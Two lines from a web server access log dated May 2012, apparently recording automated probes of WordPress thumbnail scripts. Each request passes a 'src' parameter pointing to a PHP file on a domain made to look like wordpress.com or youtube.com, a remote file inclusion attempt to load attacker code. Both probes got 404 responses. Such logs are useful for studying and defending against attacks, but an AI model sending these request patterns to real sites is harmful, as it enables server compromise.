69.197.162.35 - - [14/May/2012:08:19:08 +0200] "GET //wp-content/plugins/igit-related-posts-with-thumb-images-after-posts/?src=http://wordpress.com.airatrip.com/temp/phantom.php HTTP/1.1" 404 351 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
199.59.58.152 - - [14/May/2012:08:19:25 +0200] "GET /stats//wp-content/themes/welcome_inn/thumb.php?src=http://img.youtube.com.cr3ativiz.web.id/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
